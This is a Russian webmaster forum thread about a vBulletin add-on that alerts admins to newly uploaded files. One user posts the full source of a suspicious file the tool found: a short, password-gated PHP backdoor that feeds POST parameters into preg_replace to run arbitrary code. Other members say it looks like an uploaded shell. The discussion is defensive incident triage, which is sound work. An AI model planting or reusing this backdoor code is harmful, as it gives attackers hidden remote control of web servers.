Форум вебмастеров

Хаки vBulletin Интересные и полезные хаки и моды для vBulletin

Ответ
 
LinkBack Опции темы
Старый 29.02.2012, 04:13 #1 (Ссылка)
Чёрный кардинал
Дополнительная информация
По умолчанию

Хак инспектор файлов для vBulletin


Хак инспектор файлов для vBulletin - чудо хак для безопасности вашего форума. Как только вы сами или какой перец загрузит новые файлы к вам в директорию форума - на почту придет письмо со списком этого файла

Ну а дальше мочить. Или себя или хакера

Установка:
  • Заливаем файлы из папки upload
  • Импортируем продукт в своей кодировке
  • Настраиваем в админке юзера который может смотреть файлы

Все
Миниатюры
Хак инспектор файлов для vBulletin-ins.jpg   Хак инспектор файлов для vBulletin-ins1.jpg   Хак инспектор файлов для vBulletin-ins2.jpg  
Вложения
Тип файла: zip inspector.zip (19.4 Кб, 64 просмотров)

Последний раз редактировалось Ночная странница; 01.02.2013 в 04:37. Причина: перезалила вложения
Boss вне форума   Ответить с цитированиемОтветить с цитированием
3 пользователя(ей) сказали cпасибо:
inso (16.10.2013), Megaman (22.06.2012), Ночная странница (09.03.2012)

Старый 22.03.2013, 19:53 #21 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Allex Посмотреть сообщение
Ничего страшного, если я всё это
Это файлы админки форума.
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Allex (23.03.2013)

Старый 23.03.2013, 11:25 #22 (Ссылка)
Местный
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Veter Посмотреть сообщение
Это файлы админки форума.
Спасибо. Я уже говорил, что это лучший форум?
Allex вне форума   Ответить с цитированиемОтветить с цитированием

Старый 05.06.2013, 19:41 #23 (Ссылка)
Местный
Дополнительная информация
По умолчанию

Подскажите, плиз, что за файлик появился, надо ли его удалять?

Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)

Изменено файлов: 0
Allex вне форума   Ответить с цитированиемОтветить с цитированием

Старый 05.06.2013, 19:42 #24 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Новые стили админки загружали?
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Allex (06.06.2013)

Старый 06.06.2013, 21:34 #25 (Ссылка)
Местный
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Veter Посмотреть сообщение
Новые стили админки загружали?
Нет. Мог разделы удалить.
Allex вне форума   Ответить с цитированиемОтветить с цитированием

Старый 06.06.2013, 23:12 #26 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

При чем здесь разделы? Файл появился в папке /cpstyles. Поэтому я и сделал вывод, что вы загружали какой то стиль админки.
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Allex (08.06.2013)

Старый 07.06.2013, 01:17 #27 (Ссылка)
Вебмастер
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Allex Посмотреть сообщение
Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.
Прометей вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Allex (08.06.2013)

Старый 08.06.2013, 11:45 #28 (Ссылка)
Местный
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Прометей Посмотреть сообщение
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.
В дистре не было.
Вот его содержимое:
<?php
if (md5($_POST['p']) == 'ad5fdc193226be1841c53825d7004925') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}


Для шела не много.
Проверил с помощью virustotal точка com. Ничего подозрительного.

Как узнать, когда, кто и с какого IP его закачал?
И как можно закачивать файлы без доступа на ftp или http?

Последний раз редактировалось Allex; 08.06.2013 в 11:57.
Allex вне форума   Ответить с цитированиемОтветить с цитированием

Старый 08.06.2013, 19:02 #29 (Ссылка)
Администратор
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Allex Посмотреть сообщение
Как узнать, когда, кто и с какого IP его закачал?
Копаться в логах

Цитата:
Сообщение от Allex Посмотреть сообщение
И как можно закачивать файлы без доступа на ftp или http?
А вы уверены, что без доступа?
Veter вне форума   Ответить с цитированиемОтветить с цитированием
Пользователь сказал cпасибо:
Allex (15.06.2013)

Старый 15.06.2013, 22:19 #30 (Ссылка)
Местный
Дополнительная информация
По умолчанию

Цитата:
Сообщение от Veter Посмотреть сообщение
Копаться в логах

Теоретически я и сам это понимаю, если бы ещё ткнули в нужный файлик мою ленивую морду сущность.
Allex вне форума   Ответить с цитированиемОтветить с цитированием

Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Плагин для загрузки файлов на сайт пользователями Дмитрий864 Вопросы от новичков 2 24.03.2015 18:20
Вопросы по настройкам вложений и скачиванию файлов batman vBulletin 9 10.04.2013 23:43
Как сменить иконки файлов в Widows 7? Ночная странница Операционная система 11 02.02.2013 16:19
Вопрос о прикреплении файлов на phpbb2 kmaks Вопросы по движкам 3 18.11.2010 19:37
«Программирование командных BAT-файлов в Windows» roma_kenga Web программирование 9 28.04.2010 04:57


Текущее время: 05:48. Часовой пояс GMT +3.

Powered by vBulletin®
Copyright ©2000 - 2022, WMboard.
Перевод: zCarot
 

Форум вебмастеров

Здесь делают сайты, учатся на них зарабатывать. Ты новичок, и ничего не понимаешь в создании сайтов и в интернет заработке? Не знаешь ответа на вопрос по сайтостроению? Мучают вопросы сео оптимизации?

Не беда, присоединяйся к сообществу вебмастеров, и зарабатывай вместе с нами!